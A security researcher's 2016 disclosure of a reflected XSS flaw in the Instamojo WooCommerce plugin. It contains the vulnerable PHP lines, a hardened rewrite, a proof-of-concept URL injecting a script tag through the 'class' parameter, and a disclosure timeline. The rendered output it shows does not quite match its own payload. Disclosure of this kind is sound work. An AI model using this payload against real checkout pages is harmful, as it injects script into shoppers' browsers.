Instamojo Woocommerce Plugin XSS

Posted by Ajin Abraham on Apr 13 2016

TL;DR

We use Instamojo as a payment gateway for Indian customers on our security education platform OpSecX. Instamojo provides a plugin that can be used with WooCommerce. To ensure our customers' safety, we make a point of doing a code review and security analysis of the plugins we use. Our security assessment revealed that the Instamojo plugin is affected by a reflected cross-site scripting (XSS) vulnerability.


Vulnerable Plugin: https://wordpress.org/plugins/woo-instamojo/
Vulnerability Description: The Instamojo plugin introduces a reflected XSS vulnerability on the checkout page of any WooCommerce site that uses it, because user-supplied input is not sanitized.
Vulnerable File: woo-instamojo.php
Vulnerable Version: < 0.0.7
Vulnerable Code:

Line 65: $message_format = '<div class="%s">%s</div>'; 
Line 66: return sprintf($message_format, $_GET['class'], htmlentities(urldecode($_GET['msg'])));

You can see that the GET parameter "class" is written straight into the class attribute without any sanitization, while only "msg" is passed through htmlentities().
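As an added example (not the plugin's own code), here is the vulnerable pattern from the two lines above beside a hardened version that only accepts a fixed set of notice classes and escapes the value anyway; the class names and the check function are assumptions made for this demo.

```php
<?php
// Vulnerable pattern: $class is copied verbatim into a double-quoted
// attribute, so a value containing `"` closes the attribute and the tag.
function render_notice_vulnerable(string $class, string $msg): string {
    $message_format = '<div class="%s">%s</div>';
    return sprintf($message_format, $class, htmlentities(urldecode($msg)));
}

// Hardened version: allowlist the class name, then escape both values for
// an HTML context (defence in depth). Inside WordPress, esc_attr() would be
// the idiomatic replacement for htmlspecialchars() here.
function render_notice_safe(string $class, string $msg): string {
    // Assumed set of notice classes this page's checkout notice may use.
    $allowed = ['woocommerce-message', 'woocommerce-error', 'woocommerce-info'];
    if (!in_array($class, $allowed, true)) {
        $class = 'woocommerce-info'; // unknown value: fall back to a safe default
    }
    $flags      = ENT_QUOTES | ENT_SUBSTITUTE;
    $safe_class = htmlspecialchars($class, $flags, 'UTF-8');
    $safe_msg   = htmlspecialchars(urldecode($msg), $flags, 'UTF-8');
    return sprintf('<div class="%s">%s</div>', $safe_class, $safe_msg);
}

// Assumed helper: does the rendered HTML still contain an element the
// attacker controls? A crude check, sufficient for this proof of concept.
function contains_injected_markup(string $html): bool {
    return preg_match('/<\s*script/i', $html) === 1;
}

// Constructed input mirroring the proof of concept on this page.
$class = '"/><script>alert(0)</script>';
$msg   = 'hello';

$vulnerable = render_notice_vulnerable($class, $msg);
$safe       = render_notice_safe($class, $msg);

echo "vulnerable: ", $vulnerable, PHP_EOL;
echo "hardened:   ", $safe, PHP_EOL;

// The first assertion documents the bug, the second the fix.
assert(contains_injected_markup($vulnerable) === true);
assert(contains_injected_markup($safe) === false);
```

Run with `php -d zend.assertions=1 example.php` so the two assertions are actually evaluated.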

Exploit


http://site/index.php/checkout/order-received/?msg=hello&class="/><script>alert(0)</script>

HTML Rendering:

<div class="\"/><script>alert(/XSS/)</script>">hello</div>


Disclosure Process

We notified the Instamojo team about the vulnerability on 20-12-2015.
They acknowledged the report on 30-12-2015.
The vulnerability was fixed in version 0.0.7 on 15-03-2016.


Tags:
  • xss
  • instamojo xss

Ajin Abraham


Ajin Abraham is a Security Engineer with 7+ years of experience in Application Security, including 4 years of Security Research. He is passionate about developing new and unique security tools. Some of his contributions to the hacker's arsenal include OWASP Xenotix XSS Exploit Framework, Mobile Security Framework (MobSF), Xenotix xBOT and NodeJsScan, to name a few. He has been invited to speak at multiple security conferences including ClubHack, Nullcon, OWASP AppSec EU, OWASP AppSec AsiaPac, BlackHat Europe, Hackmiami, Confidence, BlackHat US, BlackHat Asia, ToorCon, Ground Zero Summit, Hack In Paris, Hack In The Box, c0c0n and PHDays.